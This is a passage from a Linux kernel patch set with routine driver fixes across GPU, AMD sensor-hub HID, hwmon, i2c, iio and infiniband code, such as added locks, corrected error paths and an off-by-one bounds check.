++++ b/drivers/gpu/drm/vgem/vgem_fence.c
+@@ -249,4 +249,5 @@ void vgem_fence_close(struct vgem_file *vfile)
+ {
+ 	idr_for_each(&vfile->fence_idr, __vgem_fence_idr_fini, vfile);
+ 	idr_destroy(&vfile->fence_idr);
++	mutex_destroy(&vfile->fence_mutex);
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 445d619e1fdc8..9fec194cdbf16 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1420,70 +1420,10 @@ static void vmw_framebuffer_bo_destroy(struct drm_framebuffer *framebuffer)
+ 	kfree(vfbd);
+ }
+ 
+-static int vmw_framebuffer_bo_dirty(struct drm_framebuffer *framebuffer,
+-				    struct drm_file *file_priv,
+-				    unsigned int flags, unsigned int color,
+-				    struct drm_clip_rect *clips,
+-				    unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-	struct vmw_framebuffer_bo *vfbd =
+-		vmw_framebuffer_to_vfbd(framebuffer);
+-	struct drm_clip_rect norect;
+-	int ret, increment = 1;
+-
+-	drm_modeset_lock_all(&dev_priv->drm);
+-
+-	if (!num_clips) {
+-		num_clips = 1;
+-		clips = &norect;
+-		norect.x1 = norect.y1 = 0;
+-		norect.x2 = framebuffer->width;
+-		norect.y2 = framebuffer->height;
+-	} else if (flags & DRM_MODE_FB_DIRTY_ANNOTATE_COPY) {
+-		num_clips /= 2;
+-		increment = 2;
+-	}
+-
+-	switch (dev_priv->active_display_unit) {
+-	case vmw_du_legacy:
+-		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, &vfbd->base, 0, 0,
+-					      clips, num_clips, increment);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		WARN_ONCE(true, "Dirty called with invalid display system.\n");
+-		break;
+-	}
+-
+-	vmw_cmd_flush(dev_priv, false);
+-
+-	drm_modeset_unlock_all(&dev_priv->drm);
+-
+-	return ret;
+-}
+-
+-static int vmw_framebuffer_bo_dirty_ext(struct drm_framebuffer *framebuffer,
+-					struct drm_file *file_priv,
+-					unsigned int flags, unsigned int color,
+-					struct drm_clip_rect *clips,
+-					unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-
+-	if (dev_priv->active_display_unit == vmw_du_legacy &&
+-	    vmw_cmd_supported(dev_priv))
+-		return vmw_framebuffer_bo_dirty(framebuffer, file_priv, flags,
+-						color, clips, num_clips);
+-
+-	return drm_atomic_helper_dirtyfb(framebuffer, file_priv, flags, color,
+-					 clips, num_clips);
+-}
+-
+ static const struct drm_framebuffer_funcs vmw_framebuffer_bo_funcs = {
+ 	.create_handle = vmw_framebuffer_bo_create_handle,
+ 	.destroy = vmw_framebuffer_bo_destroy,
+-	.dirty = vmw_framebuffer_bo_dirty_ext,
++	.dirty = drm_atomic_helper_dirtyfb,
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index 4d6e7b555db79..83595325cc186 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -512,11 +512,6 @@ void vmw_du_connector_destroy_state(struct drm_connector *connector,
+  */
+ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv);
+ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv);
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment);
+ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 			 const struct drm_clip_rect *clips,
+ 			 unsigned num_clips,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index a56e5d0ca3c65..ac72c20715f32 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -234,6 +234,7 @@ static const struct drm_crtc_funcs vmw_legacy_crtc_funcs = {
+ 	.atomic_duplicate_state = vmw_du_crtc_duplicate_state,
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
++	.page_flip = drm_atomic_helper_page_flip,
+ };
+ 
+ 
+@@ -273,6 +274,12 @@ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
+ };
+ 
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips);
++
+ /*
+  * Legacy Display Plane Functions
+  */
+@@ -291,7 +298,6 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_framebuffer *fb;
+ 	struct drm_crtc *crtc = new_state->crtc ?: old_state->crtc;
+ 
+-
+ 	ldu = vmw_crtc_to_ldu(crtc);
+ 	dev_priv = vmw_priv(plane->dev);
+ 	fb       = new_state->fb;
+@@ -304,8 +310,31 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		vmw_ldu_del_active(dev_priv, ldu);
+ 
+ 	vmw_ldu_commit_list(dev_priv);
+-}
+ 
++	if (vfb && vmw_cmd_supported(dev_priv)) {
++		struct drm_mode_rect fb_rect = {
++			.x1 = 0,
++			.y1 = 0,
++			.x2 = vfb->base.width,
++			.y2 = vfb->base.height
++		};
++		struct drm_mode_rect *damage_rects = drm_plane_get_damage_clips(new_state);
++		u32 rect_count = drm_plane_get_damage_clips_count(new_state);
++		int ret;
++
++		if (!damage_rects) {
++			damage_rects = &fb_rect;
++			rect_count = 1;
++		}
++
++		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, vfb, 0, 0, damage_rects, rect_count);
++
++		drm_WARN_ONCE(plane->dev, ret,
++			"vmw_kms_ldu_do_bo_dirty failed with: ret=%d\n", ret);
++
++		vmw_cmd_flush(dev_priv, false);
++	}
++}
+ 
+ static const struct drm_plane_funcs vmw_ldu_plane_funcs = {
+ 	.update_plane = drm_atomic_helper_update_plane,
+@@ -536,11 +565,11 @@ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv)
+ }
+ 
+ 
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment)
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips)
+ {
+ 	size_t fifo_size;
+ 	int i;
+@@ -556,7 +585,7 @@ int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+ 		return -ENOMEM;
+ 
+ 	memset(cmd, 0, fifo_size);
+-	for (i = 0; i < num_clips; i++, clips += increment) {
++	for (i = 0; i < num_clips; i++, clips++) {
+ 		cmd[i].header = SVGA_CMD_UPDATE;
+ 		cmd[i].body.x = clips->x1;
+ 		cmd[i].body.y = clips->y1;
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index c8e7994c2c9cd..84b23d36bcef4 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -13,6 +13,11 @@
+ #include "context.h"
+ #include "dev.h"
+ 
++static void host1x_memory_context_release(struct device *dev)
++{
++	/* context device is freed in host1x_memory_context_list_free() */
++}
++
+ int host1x_memory_context_list_init(struct host1x *host1x)
+ {
+ 	struct host1x_memory_context_list *cdl = &host1x->context_list;
+@@ -53,28 +58,30 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 		dev_set_name(&ctx->dev, "host1x-ctx.%d", i);
+ 		ctx->dev.bus = &host1x_context_device_bus_type;
+ 		ctx->dev.parent = host1x->dev;
++		ctx->dev.release = host1x_memory_context_release;
+ 
+ 		dma_set_max_seg_size(&ctx->dev, UINT_MAX);
+ 
+ 		err = device_add(&ctx->dev);
+ 		if (err) {
+ 			dev_err(host1x->dev, "could not add context device %d: %d\n", i, err);
+-			goto del_devices;
++			put_device(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		err = of_dma_configure_id(&ctx->dev, node, true, &i);
+ 		if (err) {
+ 			dev_err(host1x->dev, "IOMMU configuration failed for context device %d: %d\n",
+ 				i, err);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		fwspec = dev_iommu_fwspec_get(&ctx->dev);
+ 		if (!fwspec || !device_iommu_mapped(&ctx->dev)) {
+ 			dev_err(host1x->dev, "Context device %d has no IOMMU!\n", i);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		ctx->stream_id = fwspec->ids[0] & 0xffff;
+@@ -82,11 +89,12 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 
+ 	return 0;
+ 
+-del_devices:
++unreg_devices:
+ 	while (i--)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
++	cdl->devs = NULL;
+ 	cdl->len = 0;
+ 
+ 	return err;
+@@ -97,7 +105,7 @@ void host1x_memory_context_list_free(struct host1x_memory_context_list *cdl)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < cdl->len; i++)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
+ 	cdl->len = 0;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index 47774b9ab3de0..c936d6a51c0cd 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -367,6 +367,14 @@ init_done:
+ 	return devm_add_action_or_reset(&pdev->dev, privdata->mp2_ops->remove, privdata);
+ }
+ 
++static void amd_sfh_shutdown(struct pci_dev *pdev)
++{
++	struct amd_mp2_dev *mp2 = pci_get_drvdata(pdev);
++
++	if (mp2 && mp2->mp2_ops)
++		mp2->mp2_ops->stop_all(mp2);
++}
++
+ static int __maybe_unused amd_mp2_pci_resume(struct device *dev)
+ {
+ 	struct amd_mp2_dev *mp2 = dev_get_drvdata(dev);
+@@ -401,6 +409,7 @@ static struct pci_driver amd_mp2_pci_driver = {
+ 	.id_table	= amd_mp2_pci_tbl,
+ 	.probe		= amd_mp2_pci_probe,
+ 	.driver.pm	= &amd_mp2_pm_ops,
++	.shutdown	= amd_sfh_shutdown,
+ };
+ module_pci_driver(amd_mp2_pci_driver);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 0609fea581c96..6f0d332ccf51c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -218,7 +218,7 @@ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
+ 			     OFFSET_SENSOR_DATA_DEFAULT;
+ 		memcpy_fromio(&als_data, sensoraddr, sizeof(struct sfh_als_data));
+ 		get_common_inputs(&als_input.common_property, report_id);
+-		als_input.illuminance_value = als_data.lux;
++		als_input.illuminance_value = float_to_int(als_data.lux);
+ 		report_size = sizeof(als_input);
+ 		memcpy(input_report, &als_input, sizeof(als_input));
+ 		break;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index a1d6e08fab7d4..bb8bd7892b674 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -112,6 +112,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_sfh_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -170,6 +171,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = (status == 0) ? SENSOR_ENABLED : SENSOR_DISABLED;
+ 
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(i, cl_data);
+ 			if (rc) {
+@@ -186,12 +188,21 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+index c6df959ec7252..4f81ef2d4f56e 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+@@ -16,11 +16,11 @@ static int amd_sfh_wait_response(struct amd_mp2_dev *mp2, u8 sid, u32 cmd_id)
+ {
+ 	struct sfh_cmd_response cmd_resp;
+ 
+-	/* Get response with status within a max of 1600 ms timeout */
++	/* Get response with status within a max of 10000 ms timeout */
+ 	if (!readl_poll_timeout(mp2->mmio + AMD_P2C_MSG(0), cmd_resp.resp,
+ 				(cmd_resp.response.response == 0 &&
+ 				cmd_resp.response.cmd_id == cmd_id && (sid == 0xff ||
+-				cmd_resp.response.sensor_id == sid)), 500, 1600000))
++				cmd_resp.response.sensor_id == sid)), 500, 10000000))
+ 		return cmd_resp.response.response;
+ 
+ 	return -1;
+@@ -33,6 +33,7 @@ static void amd_start_sensor(struct amd_mp2_dev *privdata, struct amd_mp2_sensor
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = ENABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = info.sensor_idx;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+@@ -45,6 +46,7 @@ static void amd_stop_sensor(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = sensor_idx;
+ 
+ 	writeq(0x0, privdata->mmio + AMD_C2P_MSG(1));
+@@ -56,8 +58,10 @@ static void amd_stop_all_sensor(struct amd_mp2_dev *privdata)
+ 	struct sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.ul = 0;
+-	cmd_base.cmd.cmd_id = STOP_ALL_SENSORS;
++	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	/* 0xf indicates all sensors */
++	cmd_base.cmd.sensor_id = 0xf;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+ }
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+index ae47a369dc05a..9d31d5b510eb4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+@@ -33,9 +33,9 @@ struct sfh_cmd_base {
+ 		struct {
+ 			u32 sensor_id		: 4;
+ 			u32 cmd_id		: 4;
+-			u32 sub_cmd_id		: 6;
+-			u32 length		: 12;
+-			u32 rsvd		: 5;
++			u32 sub_cmd_id		: 8;
++			u32 sub_cmd_value	: 12;
++			u32 rsvd		: 3;
+ 			u32 intr_disable	: 1;
+ 		} cmd;
+ 	};
+@@ -133,7 +133,7 @@ struct sfh_mag_data {
+ 
+ struct sfh_als_data {
+ 	struct sfh_common_data commondata;
+-	u16 lux;
++	u32 lux;
+ };
+ 
+ struct hpd_status {
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index 5d776a185bd62..ce8c44e792213 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/err.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
+ #include <linux/interrupt.h>
+diff --git a/drivers/hte/hte-tegra194.c b/drivers/hte/hte-tegra194.c
+index 49a27af22742b..d1b579c822797 100644
+--- a/drivers/hte/hte-tegra194.c
++++ b/drivers/hte/hte-tegra194.c
+@@ -251,7 +251,7 @@ static int tegra_hte_map_to_line_id(u32 eid,
+ {
+ 
+ 	if (m) {
+-		if (eid > map_sz)
++		if (eid >= map_sz)
+ 			return -EINVAL;
+ 		if (m[eid].slice == NV_AON_SLICE_INVALID)
+ 			return -EINVAL;
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6e4c92b500b8e..6a6ebcc896b1d 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1604,9 +1604,9 @@ static int adt7475_set_pwm_polarity(struct i2c_client *client)
+ 	int ret, i;
+ 	u8 val;
+ 
+-	ret = of_property_read_u32_array(client->dev.of_node,
+-					 "adi,pwm-active-state", states,
+-					 ARRAY_SIZE(states));
++	ret = device_property_read_u32_array(&client->dev,
++					     "adi,pwm-active-state", states,
++					     ARRAY_SIZE(states));
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 5a9d47a229e40..be8bbb1c3a02d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -75,6 +75,7 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ 
+ #define ZEN_CUR_TEMP_SHIFT			21
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
++#define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+@@ -155,7 +156,8 @@ static long get_raw_temp(struct k10temp_data *data)
+ 
+ 	data->read_tempreg(data->pdev, &regval);
+ 	temp = (regval >> ZEN_CUR_TEMP_SHIFT) * 125;
+-	if (regval & data->temp_adjust_mask)
++	if ((regval & data->temp_adjust_mask) ||
++	    (regval & ZEN_CUR_TEMP_TJ_SEL_MASK) == ZEN_CUR_TEMP_TJ_SEL_MASK)
+ 		temp -= 49000;
+ 	return temp;
+ }
+diff --git a/drivers/hwmon/pmbus/fsp-3y.c b/drivers/hwmon/pmbus/fsp-3y.c
+index aec294cc72d1f..c7469d2cdedcf 100644
+--- a/drivers/hwmon/pmbus/fsp-3y.c
++++ b/drivers/hwmon/pmbus/fsp-3y.c
+@@ -180,7 +180,6 @@ static struct pmbus_driver_info fsp3y_info[] = {
+ 			PMBUS_HAVE_FAN12,
+ 		.func[YM2151_PAGE_5VSB_LOG] =
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_IOUT,
+-			PMBUS_HAVE_IIN,
+ 		.read_word_data = fsp3y_read_word_data,
+ 		.read_byte_data = fsp3y_read_byte_data,
+ 	},
+diff --git a/drivers/hwtracing/coresight/coresight-etm-perf.c b/drivers/hwtracing/coresight/coresight-etm-perf.c
+index 43bbd5dc3d3b1..f9a0ee49d8e80 100644
+--- a/drivers/hwtracing/coresight/coresight-etm-perf.c
++++ b/drivers/hwtracing/coresight/coresight-etm-perf.c
+@@ -870,6 +870,7 @@ int __init etm_perf_init(void)
+ 	etm_pmu.addr_filters_sync	= etm_addr_filters_sync;
+ 	etm_pmu.addr_filters_validate	= etm_addr_filters_validate;
+ 	etm_pmu.nr_addr_filters		= ETM_ADDR_CMP_MAX;
++	etm_pmu.module			= THIS_MODULE;
+ 
+ 	ret = perf_pmu_register(&etm_pmu, CORESIGHT_ETM_PMU_NAME, -1);
+ 	if (ret == 0)
+diff --git a/drivers/i2c/busses/i2c-cadence.c b/drivers/i2c/busses/i2c-cadence.c
+index f58943cb13414..8a5fdb150c446 100644
+--- a/drivers/i2c/busses/i2c-cadence.c
++++ b/drivers/i2c/busses/i2c-cadence.c
+@@ -833,8 +833,10 @@ static int cdns_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
+ #if IS_ENABLED(CONFIG_I2C_SLAVE)
+ 	/* Check i2c operating mode and switch if possible */
+ 	if (id->dev_mode == CDNS_I2C_MODE_SLAVE) {
+-		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE)
+-			return -EAGAIN;
++		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/* Set mode to master */
+ 		cdns_i2c_set_mode(CDNS_I2C_MODE_MASTER, id);
+diff --git a/drivers/i2c/busses/i2c-omap.c b/drivers/i2c/busses/i2c-omap.c
+index f9ae520aed228..7ec2521997061 100644
+--- a/drivers/i2c/busses/i2c-omap.c
++++ b/drivers/i2c/busses/i2c-omap.c
+@@ -1058,7 +1058,7 @@ omap_i2c_isr(int irq, void *dev_id)
+ 	u16 stat;
+ 
+ 	stat = omap_i2c_read_reg(omap, OMAP_I2C_STAT_REG);
+-	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG);
++	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG) & ~OMAP_I2C_STAT_NACK;
+ 
+ 	if (stat & mask)
+ 		ret = IRQ_WAKE_THREAD;
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index bee5a2ef1f229..2bf3713b1969d 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -704,7 +704,7 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	err = xiic_start_xfer(i2c, msgs, num);
+ 	if (err < 0) {
+ 		dev_err(adap->dev.parent, "Error xiic_start_xfer\n");
+-		return err;
++		goto out;
+ 	}
+ 
+ 	err = wait_for_completion_timeout(&i2c->completion, XIIC_XFER_TIMEOUT);
+@@ -722,6 +722,8 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		err = (i2c->state == STATE_DONE) ? num : -EIO;
+ 	}
+ 	mutex_unlock(&i2c->lock);
++
++out:
+ 	pm_runtime_mark_last_busy(i2c->dev);
+ 	pm_runtime_put_autosuspend(i2c->dev);
+ 	return err;
+diff --git a/drivers/iio/adc/palmas_gpadc.c b/drivers/iio/adc/palmas_gpadc.c
+index fd000345ec5cf..849a697a467e5 100644
+--- a/drivers/iio/adc/palmas_gpadc.c
++++ b/drivers/iio/adc/palmas_gpadc.c
+@@ -639,7 +639,7 @@ out:
+ 
+ static int palmas_gpadc_remove(struct platform_device *pdev)
+ {
+-	struct iio_dev *indio_dev = dev_to_iio_dev(&pdev->dev);
++	struct iio_dev *indio_dev = dev_get_drvdata(&pdev->dev);
+ 	struct palmas_gpadc *adc = iio_priv(indio_dev);
+ 
+ 	if (adc->wakeup1_enable || adc->wakeup2_enable)
+diff --git a/drivers/iio/addac/stx104.c b/drivers/iio/addac/stx104.c
+index 48a91a95e597b..b658a75d4e3a8 100644
+--- a/drivers/iio/addac/stx104.c
++++ b/drivers/iio/addac/stx104.c
+@@ -15,6 +15,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
++#include <linux/mutex.h>
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+@@ -69,10 +70,12 @@ struct stx104_reg {
+ 
+ /**
+  * struct stx104_iio - IIO device private data structure
++ * @lock: synchronization lock to prevent I/O race conditions
+  * @chan_out_states:	channels' output states
+  * @reg:		I/O address offset for the device registers
+  */
+ struct stx104_iio {
++	struct mutex lock;
+ 	unsigned int chan_out_states[STX104_NUM_OUT_CHAN];
+ 	struct stx104_reg __iomem *reg;
+ };
+@@ -114,6 +117,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 			return IIO_VAL_INT;
+ 		}
+ 
++		mutex_lock(&priv->lock);
++
+ 		/* select ADC channel */
+ 		iowrite8(chan->channel | (chan->channel << 4), &reg->achan);
+ 
+@@ -124,6 +129,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 		while (ioread8(&reg->cir_asr) & BIT(7));
+ 
+ 		*val = ioread16(&reg->ssr_ad);
++
++		mutex_unlock(&priv->lock);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* get ADC bipolar/unipolar configuration */
+@@ -178,9 +185,12 @@ static int stx104_write_raw(struct iio_dev *indio_dev,
+ 			if ((unsigned int)val > 65535)
+ 				return -EINVAL;
+ 
++			mutex_lock(&priv->lock);
++
+ 			priv->chan_out_states[chan->channel] = val;
+ 			iowrite16(val, &priv->reg->dac[chan->channel]);
+ 
++			mutex_unlock(&priv->lock);
+ 			return 0;
+ 		}
+ 		return -EINVAL;
+@@ -351,6 +361,8 @@ static int stx104_probe(struct device *dev, unsigned int id)
+ 
+ 	indio_dev->name = dev_name(dev);
+ 
++	mutex_init(&priv->lock);
++
+ 	/* configure device for software trigger operation */
+ 	iowrite8(0, &priv->reg->acr);
+ 
+diff --git a/drivers/iio/light/max44009.c b/drivers/iio/light/max44009.c
+index 801e5a0ad496b..f3648f20ef2c0 100644
+--- a/drivers/iio/light/max44009.c
++++ b/drivers/iio/light/max44009.c
+@@ -528,6 +528,12 @@ static int max44009_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static const struct of_device_id max44009_of_match[] = {
++	{ .compatible = "maxim,max44009" },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, max44009_of_match);
++
+ static const struct i2c_device_id max44009_id[] = {
+ 	{ "max44009", 0 },
+ 	{ }
+@@ -537,18 +543,13 @@ MODULE_DEVICE_TABLE(i2c, max44009_id);
+ static struct i2c_driver max44009_driver = {
+ 	.driver = {
+ 		.name = MAX44009_DRV_NAME,
++		.of_match_table = max44009_of_match,
+ 	},
+ 	.probe = max44009_probe,
+ 	.id_table = max44009_id,
+ };
+ module_i2c_driver(max44009_driver);
+ 
+-static const struct of_device_id max44009_of_match[] = {
+-	{ .compatible = "maxim,max44009" },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, max44009_of_match);
+-
+ MODULE_AUTHOR("Robert Eshleman <bobbyeshleman@gmail.com>");
+ MODULE_LICENSE("GPL v2");
+ MODULE_DESCRIPTION("MAX44009 ambient light sensor driver");
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 603c0aecc3614..ff58058aeadca 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -2912,6 +2912,8 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 	    (ari && ari_length > IB_CM_REJ_ARI_LENGTH))
+ 		return -EINVAL;
+ 
++	trace_icm_send_rej(&cm_id_priv->id, reason);
++
+ 	switch (state) {
+ 	case IB_CM_REQ_SENT:
+ 	case IB_CM_MRA_REQ_RCVD:
+@@ -2942,7 +2944,6 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 		return -EINVAL;
+ 	}
+ 
+-	trace_icm_send_rej(&cm_id_priv->id, reason);
+ 	ret = ib_post_send_mad(msg, NULL);
+ 	if (ret) {
+ 		cm_free_msg(msg);
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index 8a8d4539a006b..51ab2058b03f1 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -112,6 +112,10 @@
+ 
+ #define ERDMA_PAGE_SIZE_SUPPORT 0x7FFFF000
